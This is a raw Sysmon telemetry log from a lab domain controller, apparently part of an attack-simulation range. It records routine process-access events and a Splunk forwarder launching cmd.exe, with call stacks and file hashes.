13:09:45.478{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001553Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.478{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001552Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.478{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001551Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.478{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001550Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.478{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001549Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.478{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001548Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.478{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001547Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.478{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001546Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.478{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001545Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.478{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001544Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.478{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001543Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.478{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001542Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.478{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001541Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.478{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001540Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.478{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001539Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.478{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001538Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.478{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001537Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.478{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001536Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.478{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001535Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.478{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001534Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.478{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001533Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.462{08A6967A-4299-6000-3F00-000000009A01}38883908C:\Windows\system32\conhost.exe{08A6967A-4299-6000-3E00-000000009A01}3880C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001532Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.447{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}3888C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001531Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.447{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}3880C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001530Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.447{08A6967A-4298-6000-3400-000000009A01}23162816C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{00000000-0000-0000-0000-000000000000}3880C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f2b15|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001529Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.449{08A6967A-4299-6000-3E00-000000009A01}3880C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001528Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.322{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 